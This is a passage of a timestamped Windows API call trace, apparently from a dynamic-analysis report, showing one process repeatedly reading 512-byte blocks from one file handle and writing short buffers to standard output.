_get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.103] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.103] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, 
lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.104] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.104] GetFileType (hFile=0x50) returned 0x1 [0193.104] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.104] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, 
lpOverlapped=0x0) returned 1 [0193.104] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.104] GetFileType (hFile=0x50) returned 0x1 [0193.104] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.104] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.104] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.104] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.104] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.104] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.104] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.104] GetFileType (hFile=0x50) returned 0x1 [0193.104] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.105] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.106] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.106] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.159] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, 
lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile 
(in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.160] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 
[0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.161] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, 
lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.162] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, 
lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: 
lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.163] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, 
lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.164] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, 